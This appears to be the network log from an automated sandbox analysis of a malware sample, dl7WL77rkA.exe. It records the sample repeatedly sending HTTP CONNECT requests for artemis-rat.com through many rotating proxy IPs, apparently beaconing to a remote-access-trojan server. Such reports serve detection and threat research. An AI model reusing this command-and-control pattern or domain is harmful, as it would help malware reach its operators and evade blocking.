                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1613192.168.2.554336120.37.121.20990913876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.307187080 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.647052050 CET | 325 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:33 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1614192.168.2.554475162.159.242.138803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.307440042 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.468494892 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1615192.168.2.55431145.11.95.16550473876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.310194969 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1616192.168.2.554292103.83.36.156783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.321722984 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1617192.168.2.55440443.133.74.172156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.327069998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1618192.168.2.554434121.128.194.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.328701973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1619192.168.2.554650152.32.132.2204433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.334276915 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1620192.168.2.554651152.32.132.2204433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.336222887 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1621192.168.2.554652152.32.132.2204433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.337965012 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1622192.168.2.55435193.90.212.241533876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.339255095 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1623192.168.2.554653152.32.132.2204433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.339533091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1624192.168.2.55443791.134.140.160122173876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.341573954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124188900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083622932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.014653921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.905237913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.811331034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.679889917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1625192.168.2.55432565.1.244.232803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.343314886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.727849960 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1626192.168.2.55452572.37.217.341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.354887962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1627192.168.2.554440167.172.86.46104713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.417891026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1628192.168.2.554509194.4.50.60123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.418281078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1629192.168.2.55450723.19.244.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.418788910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1630192.168.2.554529104.21.31.189803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.419156075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.578984022 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1631192.168.2.554443216.9.224.113803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.421176910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.772892952 CET | 327 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1632192.168.2.55444679.110.202.13180813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.422153950 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1633192.168.2.554412109.194.22.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.422707081 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1634192.168.2.554537185.238.228.67803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.422981024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.579257011 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1635192.168.2.554457185.49.30.580813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.423387051 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1636192.168.2.554545104.18.20.160803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.432657003 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.587548971 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1637192.168.2.554541162.247.243.29803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.432809114 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.594156981 CET | 159 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 15
                                                                                                                                                                                                                                                            content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            x-served-by: cache-lax-kwhp1940079
                                                                                                                                                                                                                                                            Data Raw: 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74
                                                                                                                                                                                                                                                            Data Ascii: invalid request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1638192.168.2.55033392.205.61.38360733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.433265924 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.486999989 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.599596024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.608310938 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1639192.168.2.55029293.157.248.108883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.449987888 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1640192.168.2.553044189.39.118.21056783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.449987888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1641192.168.2.550378104.236.0.129221673876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.461234093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1642192.168.2.55300745.11.95.16552193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.463190079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202016115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
